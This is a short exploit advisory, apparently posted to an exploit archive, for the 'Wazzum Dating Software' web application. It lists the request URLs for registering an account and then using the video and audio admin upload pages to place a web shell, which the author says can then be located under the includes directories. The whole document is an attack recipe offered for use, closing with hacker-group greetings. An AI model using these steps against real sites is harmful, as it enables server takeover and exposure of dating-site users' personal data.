======================================================================================== | ( Title ) Wazzum Dating Software Mullti Vulnerability | ( Author ) El-Kahina | ( email ) please forgive me | | ( Web Site ) www.h4kz.com | ( Script ) http://hotfile.com/dl/32756801/c6b4b5e/Wazzum.zip.html | ( Tested on) Lunix Français v.(9.10 Ubuntu) | ( Bug ) Upload | ====================== Exploit By EL-Kahina ================================= # Exploit : 1 - Register - Step 1 http://127.0.0.1/Wazzum/register.php?step=1&case=reg&PHPSESSID=fba9845f1d798c1bf4faf996e7789b4c 2 - Register - Step 2 http://127.0.0.1/Wazzum/register.php?step=2&mode=create&case=reg (You Can Use Shell to Upload) 3 - http://127.0.0.1/Wazzum//video_admin.php?type=v (2 upload video) Use Tamper Data http://127.0.0.1/Wazzum//includes/videos/ to find evil http://127.0.0.1/Wazzum//audio_admin.php?type=a (2 upload audio) Use Tamper Data http://127.0.0.1/Wazzum//includes/audios/ to find evil ========================================== Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca) (Dz-Ghost Team ) im indoushka's sister -#[V!va Fidal Castro]#- --------------------------------------------------------------------------------------------------------------